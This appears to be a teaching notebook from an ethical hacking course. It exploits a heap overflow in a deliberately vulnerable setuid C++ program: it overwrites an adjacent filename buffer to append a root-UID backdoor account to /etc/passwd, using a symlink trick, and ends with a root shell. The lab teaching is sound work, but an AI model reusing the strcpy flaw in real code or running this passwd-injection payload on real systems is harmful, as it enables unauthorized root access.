# Heap Overflow

## Heap Overflow
- buffer overflow can happen in other segments such as **heap**, **data** and **bss**
- if an important variable is located after a buffer vulnerable to an overflow, the program's control flow can be altered (regardless of the memory segment)
    - controls may be limited
- heap overflow is not as standard as stack overflow but can be just as effective

### demos/secret.cpp is susceptible to heap overflow

```c++
strcpy(secret, argv[1]); // culprit!
```

In [60]:
! cat demos/heap_overflow/secret.cpp

#include <iostream>
#include <string>
#include <cstdio>
#include <cstring>
#include <fstream>
#include <unistd.h> //getuid()
#include <sys/types.h> // getuid()

using namespace std;

void usage(char *prog_name, char *filename) {
   printf("Usage: %s <secret to add to %s>\n", prog_name, filename);
   exit(0);
}

int main(int argc, char* argv[]) {
    int userid;
    char *secret, *secret_file;
    ofstream fout;
    
    secret = new char[100];
    secret_file = new char[20];


    strcpy(secret_file, "/var/secret");

    if (argc <2)
        usage(argv[0], secret_file);
    
    strcpy(secret, argv[1]);

    printf("[DEBUG] secret      @ %p: \'%s\'\n", secret, secret);
    printf("[DEBUG] secret_file @ %p: \'%s\'\n", secret_file, secret_file);

    userid = getuid();
    fout.open(secret_file, ios_base::app); // append mode
    if (!fout) {
        cerr << "Error while opening file\n";
        cerr << "Make sure " << argv[0] << " has r/w permission to /var folder\n";
        exit(1);
 

In [69]:
%%bash
# let's compile the program
input="demos/heap_overflow/secret.cpp"
output=secret.exe

echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: 

In [70]:
# run the program
! ./secret.exe 

Usage: ./secret.exe <secret to add to /var/secret>


In [71]:
# run the program with argument
! ./secret.exe "my top secret data"

[DEBUG] secret      @ 0x8051bb0: 'my top secret data'
[DEBUG] secret_file @ 0x8051c20: '/var/secret'
Error while opening file
Make sure ./secret.exe has r/w permission to /var folder


### secret.exe must be setuid root program 
- all users in the system can keep their own secrete by writing to /var/secrets file

In [72]:
%%bash
echo kali | sudo -S chown root:root secret.exe
echo kali | sudo -S chmod u+s secret.exe
ls -al ./secret.exe

-rwsr-xr-x 1 root root 34396 Dec 21 11:35 ./secret.exe


[sudo] password for kali: 

In [73]:
! ./secret.exe "new note for user"

[DEBUG] secret      @ 0x8051bb0: 'new note for user'
[DEBUG] secret_file @ 0x8051c20: '/var/secret'
Secret saved.


In [74]:
! echo kali | sudo -S cat /var/secret

[sudo] password for kali: 1000
my top secret data
1000
new note for user


## overflowing buffer by corrupting datafile
- how far down is secret_file from secret buffer (the offset)
- try guessing...
- use gdb
- subtract the address of secret buffer from the address of scret_file

In [75]:
# the offset of secret_file from secret buffer is:
print(0x8051c20 - 0x8051bb0)

112


In [76]:
%%bash
./secret.exe $(python -c 'print("A"*112)')
# make datafile empty!

[DEBUG] secret      @ 0x8051bb0: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[DEBUG] secret_file @ 0x8051c20: ''


Error while opening file
Make sure ./secret.exe has r/w permission to /var folder


CalledProcessError: Command 'b'./secret.exe $(python -c \'print("A"*112)\')\n# make datafile empty!\n'' returned non-zero exit status 1.

In [78]:
# let's make sure testfile doesn't exist in the current director
! ls -al testfile

ls: cannot access 'testfile': No such file or directory


In [79]:
%%bash
# let's create testfile and write the data sent as an argument
./secret.exe $(python -c 'print("A"*112 + "testfile")')

double free or corruption (out)
bash: line 2: 33766 Aborted                 ./secret.exe $(python -c 'print("A"*112 + "testfile")')


CalledProcessError: Command 'b'# let\'s create testfile and write the data sent as an argument\n./secret.exe $(python -c \'print("A"*112 + "testfile")\')\n'' returned non-zero exit status 134.

In [80]:
%%bash
ls -al testfile

-rw-r--r-- 1 root kali 126 Dec 21 11:36 testfile


In [81]:
%%bash
echo kali | sudo -S cat testfile

1000
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtestfile


[sudo] password for kali: 

## Exploit the heap overflow flaw
- several clever ways to exploit this type of capability
- append a user to the /etc/passwd file?
- make a backup copy of the file just incase...

In [20]:
%%bash
cp /etc/passwd /tmp/passwd.bkup

In [21]:
%%bash
cat /tmp/passwd.bkup

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/us

## /etc/passwd file format

- Linux /etc/passwd file stores user account infor and hashed password
username:password:userid:groupid:User Info:home folder:default shell
- x : hashed password stored in /etc/shadow file
- the password field can contain hashed password
- Python crypt module provides API to create Unix passwords with hash - [https://docs.python.org/3/library/crypt.html](https://docs.python.org/3/library/crypt.html)

In [82]:
%%bash
python -c 'import crypt; print(crypt.crypt("password", "AA"))'

AA6tQYSfGxd/A


In [83]:
%%bash
python -c 'import crypt; print(crypt.crypt("password", "XX"))'

XXq2wKiyI43A2


## goal: genarate a string that looks like

`letmein:XXq2wKiyI43A2:0:0:me:/root:/bin/bash`

### problem:
- it's hard to generate the exact line ending with /bin/bash
    - because the file name /etc/passwd will be automatically attached at the end

### workaround:
- make /etc/passwd a soft link pointing to /bin/bash

In [86]:
%%bash
mkdir /tmp/etc
ln -s /bin/bash /tmp/etc/passwd

In [87]:
%%bash
ls -l /tmp/etc/passwd

lrwxrwxrwx 1 kali kali 9 Dec 21 11:37 /tmp/etc/passwd -> /bin/bash


### now we can create a valid password entry that looks like:

`letmein:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd`

#### one more thing:
- the value just before /etc/passwd must be 112 bytes long, remember?
- can play with user information column to adjust the length
- also the program writes userid [space] and the secret in the same line
- inorder for a complete userinfo entry it has to be on it's own line!
    - so add prepend '\n' to force newline for the user info

In [89]:
%%bash
# find the length with empty user info
python -c 'print("letmein:XXq2wKiyI43A2:0:0::/root:/tmp", end="")'

letmein:XXq2wKiyI43A2:0:0::/root:/tmp

In [90]:
%%bash
# find the length with empty user info
python -c 'print("letmein:XXq2wKiyI43A2:0:0::/root:/tmp", end="")' | wc -c

37


In [91]:
%%bash
echo $((112-37))

75


In [92]:
%%bash
python -c 'print("letmein:XXq2wKiyI43A2:0:0:" + "A"*75 + ":/root:/tmp", end="")' | wc -c

112


In [93]:
%%bash
./secret.exe $(python -c 'print("letmein:XXq2wKiyI43A2:0:0:" + "A"*75 + ":/root:/tmp/etc/passwd", end="")')

munmap_chunk(): invalid pointer
bash: line 1: 33815 Aborted                 ./secret.exe $(python -c 'print("letmein:XXq2wKiyI43A2:0:0:" + "A"*75 + ":/root:/tmp/etc/passwd", end="")')


CalledProcessError: Command 'b'./secret.exe $(python -c \'print("letmein:XXq2wKiyI43A2:0:0:" + "A"*75 + ":/root:/tmp/etc/passwd", end="")\')\n'' returned non-zero exit status 134.

In [94]:
%%bash
tail /etc/passwd

saned:x:127:134::/var/lib/saned:/usr/sbin/nologin
inetsim:x:128:136::/var/lib/inetsim:/usr/sbin/nologin
colord:x:129:137:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:130:138::/var/lib/geoclue:/usr/sbin/nologin
lightdm:x:131:139:Light Display Manager:/var/lib/lightdm:/bin/false
king-phisher:x:132:140::/var/lib/king-phisher:/usr/sbin/nologin
kali:x:1000:1000:kali,,,:/home/kali:/usr/bin/zsh
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
1000
letmein:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:/root:/tmp/etc/passwd


## login or su letmein:password

```bash
┌──(kali㉿K)-[~/EthicalHacking]
└─$ su letmein         
Password: 
┌──(root💀K)-[/home/kali/EthicalHacking]
└─# whoami                                                                                      
root
┌──(root💀K)-[/home/kali/EthicalHacking]
└─# date                                                                                        
Mon 21 Dec 2020 11:39:10 AM MST
┌──(root💀K)-[/home/kali/EthicalHacking]
└─#            
```